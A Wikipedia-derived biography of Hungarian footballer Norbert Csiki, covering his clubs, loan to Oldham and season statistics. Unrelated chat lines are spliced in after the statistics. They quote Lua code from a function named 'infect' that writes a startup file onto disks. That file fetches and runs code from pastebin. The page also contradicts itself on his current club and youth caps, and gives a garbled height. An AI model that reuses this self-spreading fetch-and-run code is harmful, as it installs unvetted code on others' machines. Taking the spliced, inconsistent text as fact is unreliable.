Norbert Csiki

Norbert Csiki (born 21 May 1991 in Budapest) is a Hungarian football player who is currently playing for Gyirmót SE in the Nemzeti Bajnokság I.

Norbert Csiki
Personal information
Full name Norbert Gábor Csiki
Date of birth (1991-05-21) 21 May 1991
Place of birth Budapest, Hungary
Height 1.84 m (6 ft 12 in)
Playing position(s) Forward
Club information
Current team
Kaposvár
Number 7
Youth career
2003–2005 Ferencváros
2005–2010 MTK
2009Oldham Athletic (loan)
Senior career*
Years Team Apps (Gls)
2010–2015 MTK 56 (17)
2016 Sisaket 17 (2)
2016–2017 Gyirmót 23 (1)
2017–2018 Vasas 1 (0)
2018–2019 Budaörs 24 (8)
2019– Kaposvár 25 (1)
National team
2009–2010 Hungary U-18
2010–2011 Hungary U-19
* Senior club appearances and goals counted for the domestic league only and correct as of 27 June 2020

He joined English club Oldham Athletic on loan in 2009[1] as part of an agreement between Oldham, MTK and Liverpool. He joined the club's new Development squad.[2] He was given the no. 35 squad number and was named as substitute for the first-team on a number of occasions. In February 2010 he returned to MTK after his loan period was cut short.[3]

In January 2016 he joined Thai Premier League side Sisaket F.C.[4]

International career

Csiki has represented Hungary at international level as an under-17 and under-18.

Club statistics

Club Season League Cup League Cup Europe Total
Apps Goals Apps Goals Apps Goals Apps Goals Apps Goals
MTK
2008–09 0000100010
2010–11 10313071
2011–12 1353131197
2012–13 176122020228
2013–14 803010120
2014–15 17611632410
Total5617115164208526
Sisaket
2016 17200172
Total17200172
Gyirmót
2016–17 23110241
Total23110241
Vasas
2017–18 100010
Total100010
Budaörs
2018–19 248432811
Total248432811
Kaposvár
2019–20 25100251
Total25100251
Career Total 146291681642018041

Updated to games played as of 27 June 2020.

gollark: Um, no, that's not how it works.
gollark: Quick summary:- valid disks contain a signature file and a startup- the signature can be in the old table format or hexadecimal- only disks where the signature is valid for the code on them are executed
gollark: The relevant code:```lualocal function infect(disk_side) local mp = disk.getMountPath(disk_side) if not mp then return end local ds = fs.combine(mp, "startup") -- Find paths to startup and signature files local disk_ID = disk.getID(disk_side) local sig_file = fs.combine(mp, "signature") -- shell.run disks marked with the Brand of PotatOS -- except not actually, it's cool and uses load now if fs.exists(ds) and fs.exists(sig_file) then local code = fread(ds) local sig_raw = fread(sig_file) local sig if sig_raw:find "{" then sig = textutils.unserialise(sig_raw) else sig = unhexize(sig_raw) end disk.eject(disk_side) if verify(code, sig) then -- run code, but safely (via pcall) -- print output for debugging print "Signature Valid; PotatOS Disk Loading" local out, err = load(code, "@disk/startup", nil, external_env) if not out then printError(err) else local ok, res = pcall(out, { side = disk_side, mount_path = mp, ID = disk_ID }) if ok then print(textutils.serialise(res)) else printError(res) end end else printError "Invalid Signature!" printError "Initiating Procedure 5." end -- if they're not PotatOS'd, write it on else fwrite(ds, "shell.run 'pastebin run RM13UGFa update' -- PotatOS") endend```
gollark: <@151391317740486657> What key exactly?
gollark: <@151391317740486657> Only digitally signed ones are run unsandboxed. You cannot sign a disk without the private key or probably utterly impractical hackery.

References

  1. "Overseas signings hungry to succeed". oldham-chronicle.co.uk. Retrieved 13 October 2009.
  2. "Latics introduce a new development squad". Oldham Athletic. Archived from the original on 5 September 2012. Retrieved 31 October 2010.
  3. "Hungarians cut short trial spell". oldham-chronicle.co.uk. Retrieved 31 October 2010.
  4. "Csiki signs for Koupreys". sisaketfc.net. Retrieved 16 January 2016.


This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.